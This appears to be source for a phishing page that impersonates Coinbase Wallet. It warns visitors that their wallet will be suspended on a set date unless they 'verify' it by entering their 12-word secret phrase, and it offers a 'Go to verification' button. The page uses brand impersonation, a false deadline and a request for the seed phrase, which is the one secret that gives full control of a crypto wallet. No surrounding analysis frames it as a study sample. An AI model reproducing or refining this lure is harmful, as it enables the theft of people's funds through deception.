<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Coinbase</title>
</head>
<body>
    <div class="border p-5 w-full max-w-lg mx-auto mt-20 items-center flex flex-col gap-5">
        <Image src=''  alt="coin image" width={30} height={30}/>
        <h1>Coinbase Wallet</h1>
        <p>Verification</p>
        <div>
            verify your wallete with your 12 word 
            Secret Phrase, after doing this coreectly
            the scheduled Deactivation from your 
            Wallet will be removed automatically
            Unverified wallets will be suspended on
            Wed Nov 16 2022 10:16:07 GMT -0600
            (Eastern Standard Time)
        </div>

        <div classNames="outline" >
            <p> Go to verification </p>
            <div className=" flex gap-2 items-center">
                <Image src=''  alt="coin image" width={30} height={30}/>
                <Image src=''  alt="coin image" width={30} height={30}/>
                <Image src=''  alt="coin image" width={30} height={30}/>
                <Image src=''  alt="coin image" width={30} height={30}/>
            </div>
           
        </div>
    </div>
</body>
</html>





 